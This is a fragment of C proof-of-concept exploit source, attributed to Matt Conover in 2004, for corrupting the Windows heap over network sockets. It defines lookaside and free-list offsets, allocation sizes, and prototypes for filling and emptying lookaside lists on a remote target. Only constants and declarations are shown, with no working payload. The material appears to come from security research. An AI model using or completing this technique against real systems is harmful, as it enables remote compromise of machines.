// Proof-of-concept heap exploit code
// Written by Matt Conover in December 2004
#include <windows.h>
#include "sock.h"

// These are the same for all applications:
#define CACHE_OFFSET 0x170
#define LOOKASIDE_FILL_SIZE 4
#define FREELIST_OFFSET 0x178
#define FREELIST_SIZE 8
#define FIRST_FREE_LIST (HEAP_BASE + FREELIST_OFFSET)
#define LOOKASIDE_OFFSET 0x688
#define LOOKASIDE_SIZE 48
#define FIRST_LOOKASIDE_LIST (HEAP_BASE + LOOKASIDE_OFFSET)

// Application specific
#define HEAP_BASE 0x350000
#define ALLOC_SIZE 64
#define ALLOC_SIZE2 72
#define CHUNK_SIZE2 ((ALLOC_SIZE2/8)+1)
#define CRASH_ALLOC_SIZE 104

void DumpBuffer(char *varname, char *buf, int len);
BOOL EmptyLookasideList(SOCKADDR_IN dst_addr, SOCK socks[], int AllocSize);
BOOL FillLookasideList(SOCKADDR_IN dst_addr, SOCK socks[], int AllocSize);
int AllocChunk(SOCKADDR_IN dst_addr, SOCK socks[], int AllocSize);
BOOL FreeChunk(SOCK *sock);
BOOL FreeAnyChunk(SOCK socks[], int AllocSize);
